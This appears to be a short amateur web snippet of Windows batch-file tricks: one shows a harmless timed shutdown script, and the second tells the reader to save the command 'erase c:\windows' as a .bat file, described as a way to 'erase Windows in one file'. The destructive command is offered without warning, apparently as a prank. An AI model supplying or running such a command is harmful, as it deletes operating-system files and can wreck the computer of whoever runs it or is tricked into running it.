want to create a website ?

How to Shutdown computer

 We Open Notebook then type
@echo off
shutdown -s -t 5 -c "Shutdown"

and save :- shutdown.bat

How to Erase Window In One File

Frist Of all we open notebook,
and then write
erase c:\windows

then 
save :- Kishan.bat